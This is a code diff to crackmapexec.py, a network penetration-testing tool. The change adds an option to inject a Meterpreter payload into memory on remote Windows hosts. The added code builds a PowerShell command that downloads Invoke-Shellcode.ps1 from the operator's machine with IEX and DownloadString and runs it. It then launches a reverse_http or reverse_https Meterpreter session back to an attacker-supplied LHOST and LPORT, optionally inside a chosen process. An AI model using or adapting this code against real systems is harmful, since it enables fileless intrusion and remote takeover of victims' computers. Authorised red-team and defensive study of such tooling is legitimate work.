Added option to directly inject meterpreter into memory using Invoke-Shellcode

crackmapexec.py

@@ -2661,7 +2661,19 @@ def ps_command(command=None, katz_ip=None, katz_command='privilege::debug sekurl
 
 def inject_pscommand(localip):
 
-    if args.inject == 'shellcode':
+    if args.inject == 'meterpreter':
+        command = """
+        IEX (New-Object Net.WebClient).DownloadString('http://{}/Invoke-Shellcode.ps1');
+        Invoke-Shellcode -Force -Payload windows/meterpreter/{} -Lhost {} -Lport {}""".format(localip,
+                                                                                              args.met, 
+                                                                                              args.met_options[0], 
+                                                                                              args.met_options[1])
+        if args.procid:
+            command += " -ProcessID {}".format(args.procid)
+
+        command += ';'
+
+    elif args.inject == 'shellcode':
         command = """
         IEX (New-Object Net.WebClient).DownloadString('http://{addr}/Invoke-Shellcode.ps1');
         $WebClient = New-Object System.Net.WebClient;
@@ -2997,11 +3009,13 @@ if __name__ == '__main__':
     cgroup.add_argument("-x", metavar="COMMAND", dest='command', help="Execute the specified command")
     cgroup.add_argument("-X", metavar="PS_COMMAND", dest='pscommand', help='Excute the specified powershell command')
 
-    xgroup = parser.add_argument_group("Shellcode/EXE/DLL Injection", "Options for injecting Shellcode/EXE/DLL's in memory using PowerShell")
-    xgroup.add_argument("--inject", choices={'shellcode', 'exe', 'dll'}, help='Inject Shellcode, EXE or a DLL')
+    xgroup = parser.add_argument_group("Shellcode/EXE/DLL/Meterpreter Injection", "Options for injecting Shellcode/EXE/DLL/Meterpreter in memory using PowerShell")
+    xgroup.add_argument("--inject", choices={'shellcode', 'exe', 'dll', 'meterpreter'}, help='Inject Shellcode, EXE, DLL or Meterpreter')
     xgroup.add_argument("--path", type=str, help='Path to the Shellcode/EXE/DLL you want to inject on the target systems')
-    xgroup.add_argument('--procid', type=int, help='Process ID to inject the Shellcode/EXE/DLL into (if omitted, will inject within the running PowerShell process)')
+    xgroup.add_argument('--procid', type=int, help='Process ID to inject the Shellcode/EXE/DLL/Meterpreter into (if omitted, will inject within the running PowerShell process)')
     xgroup.add_argument("--exeargs", type=str, help='Arguments to pass to the EXE being reflectively loaded (ignored if not injecting an EXE)')
+    xgroup.add_argument("--met", choices={'reverse_http', 'reverse_https'}, dest='met', help='Specify the Meterpreter to inject')
+    xgroup.add_argument("--met-options", nargs=2, metavar=('LHOST', 'LPORT'), dest='met_options', help='Meterpreter options')
 
     bgroup = parser.add_argument_group("Filesystem Interaction", "Options for interacting with filesystems")
     bgroup.add_argument("--list", metavar='PATH', help='List contents of a directory')
@@ -3022,6 +3036,7 @@ if __name__ == '__main__':
         log.setLevel(logging.INFO)
 
     if args.inject:
+        if args.inject != 'meterpreter':
             if not args.path: 
                 print_error("You must specify a '--path' to the Shellcode/EXE/DLL to inject")
                 sys.exit(1)
@@ -3031,6 +3046,11 @@ if __name__ == '__main__':
                     print_error('Unable to find Shellcode/EXE/DLL at specified path')
                     sys.exit(1)
 
+        elif args.inject == 'meterpreter':
+            if not args.met_options or not args.met:
+                print_error('You must specify a Meterpreter and it\'s options using \'--met\' and \'--met-options\'' )
+                sys.exit(1)
+
     if os.path.exists(args.target[0]):
         hosts = []
         with open(args.target[0], 'r') as target_file: